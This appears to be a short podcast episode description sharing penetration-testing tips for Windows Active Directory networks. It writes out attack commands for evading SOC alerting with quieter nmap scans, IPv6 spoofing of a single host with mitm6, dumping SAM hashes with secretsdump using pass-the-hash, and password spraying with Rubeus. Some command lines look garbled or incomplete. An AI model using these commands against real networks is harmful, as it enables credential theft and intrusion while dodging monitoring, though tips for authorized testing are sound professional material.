7MS #514: Tales of Pentest Pwnage - Part 34 4g2p6y

Welcome to another fun tale of pentest pwnage! This one isn't a telling of one single pentest, but a collection of helpful tips and tricks I've been using on a bunch of different tests lately. These tips include: I'm seeing nmap scans get flagged a bit more from managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like: nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile Using mitm6 in "sniper" mode by targeting just one host with: mitm6 victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqnd Using secretsdump to target a single host: secretsdump.py -target-ip 1.2.3.4 local:@1.2.3.4 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO. Note the colon after local - it's intentional, NOT an error! Rubeus makes spraying easy-peasy! Rubeus.exe spray /:Winter2022 /outfile:output.txt. Get some hits from that effort? Then spray the good against ALL domain s and you might get even more gold! LDAPs relaying not working? Make sure it's config'd right: nmap -p636 -sV -iL txt-file-with-dcs-in-it 2w4wx